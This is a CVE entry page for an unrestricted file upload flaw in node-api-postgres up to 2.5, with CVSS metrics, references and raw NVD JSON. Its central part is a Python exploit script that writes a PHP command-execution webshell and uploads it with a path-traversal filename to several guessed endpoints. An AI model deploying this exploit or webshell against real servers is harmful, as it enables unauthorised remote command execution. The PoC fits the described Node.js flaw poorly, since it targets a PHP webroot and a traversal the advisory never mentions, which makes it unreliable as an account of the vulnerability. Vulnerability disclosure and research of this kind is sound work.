CVE-2026-4191

Description

A flaw has been found in JawherKl node-api-postgres up to 2.5. Affected is the function path.extname of the file index.js of the component Profile Picture Handler. This manipulation causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

JawherKl node-api-postgres <= 2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4191 PoC - Unrestricted File Upload in JawherKl node-api-postgres
# Target: JawherKl node-api-postgres <= 2.5
# Vulnerability: Profile Picture Handler path.extname bypass

def exploit(target_url, file_path, filename):
    """
    Exploit for CVE-2026-4191
    Upload malicious file using path traversal in filename
    
    Args:
        target_url: Target API endpoint for profile picture upload
        file_path: Path to malicious file to upload
        filename: Filename with path traversal payload (e.g., '../../../shell.php')
    """
    try:
        with open(file_path, 'rb') as f:
            file_content = f.read()
        
        files = {
            'file': (filename, file_content, 'application/octet-stream')
        }
        
        # Try common upload endpoints
        endpoints = [
            '/api/users/avatar',
            '/api/profile/picture',
            '/api/upload/avatar',
            '/upload',
            '/api/upload'
        ]
        
        for endpoint in endpoints:
            url = target_url.rstrip('/') + endpoint
            print(f"[*] Trying upload endpoint: {url}")
            
            try:
                response = requests.post(url, files=files, timeout=10)
                
                if response.status_code == 200:
                    print(f"[+] File upload successful via {url}")
                    print(f"[+] Response: {response.text}")
                    return True
                else:
                    print(f"[-] Upload failed with status {response.status_code}")
            except requests.RequestException as e:
                print(f"[-] Request failed: {e}")
        
        return False
        
    except FileNotFoundError:
        print(f"[-] File not found: {file_path}")
        return False

def create_webshell(filepath):
    """
    Generate PHP webshell for testing
    """
    webshell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
    with open(filepath, 'wb') as f:
        f.write(webshell)
    print(f"[+] Created webshell: {filepath}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2026-4191.py <target_url> <malicious_file>")
        print("Example: python cve-2026-4191.py http://target.com evil.jpg")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    
    # Filename with path traversal to bypass extension check
    malicious_filename = "../../../var/www/html/uploads/shell.php"
    
    print("[*] CVE-2026-4191 Exploit")
    print("[*] Target: " + target)
    print("[*] Malicious file: " + file_path)
    print("[*] Filename payload: " + malicious_filename)
    
    exploit(target, file_path, malicious_filename)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4191
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4191
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4191/
[4] VulDB https://vuldb.com/cve/CVE-2026-4191
[5] https://hackmd.io/@YzU_KiOzT86cEbFQdBceVg/Bk56LQQYbe
[6] https://vuldb.com/?ctiid.351098
[7] https://vuldb.com/?id.351098
[8] https://vuldb.com/?submit.770002

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4191", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.427", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in JawherKl node-api-postgres up to 2.5. Affected is the function path.extname of the file index.js of the component Profile Picture Handler. This manipulation causes unrestricted upload. The attack is possible to be carried out remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en JawherKl node-api-postgres hasta la versión 2.5. La función path.extname del archivo index.js del componente Gestor de Imágenes de Perfil está afectada. Esta manipulación provoca una carga sin restricciones. El ataque puede llevarse a cabo de forma remota. El exploit ha sido publicado y puede ser utilizado. Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://hackmd.io/@YzU_KiOzT86cEbFQdBceVg/Bk56LQQYbe", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351098", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351098", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770002", "source": "[email protected]"}]}}